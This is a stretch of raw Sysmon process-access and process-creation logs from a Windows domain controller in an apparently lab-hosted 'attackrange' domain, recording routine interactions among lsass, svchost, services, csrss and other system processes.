08:41:22.043{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.043{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.043{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.043{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B2-5F84-3400-000000007F01}3328C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.028{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B2-5F84-3400-000000007F01}3328C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.028{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B2-5F84-3400-000000007F01}3328C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.035{5D479F2C-16B2-5F84-3400-000000007F01}3328C:\Windows\System32\vdsldr.exe10.0.14393.0 (rs1_release.160715-1616)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.027{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.027{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.014{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.014{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2A00-000000007F01}2900C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.008{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.007{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.007{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.975{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.975{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.973{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-3300-000000007F01}3076C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.966{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-3300-000000007F01}3076C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.965{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-3300-000000007F01}3076C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.964{5D479F2C-16B1-5F84-3300-000000007F01}3076C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{5D479F2C-16A1-5F84-0C00-000000007F01}612C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.958{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.956{5D479F2C-169F-5F84-0A00-000000007F01}8561260C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.955{5D479F2C-169F-5F84-0A00-000000007F01}8561264C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-1A00-000000007F01}2212C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 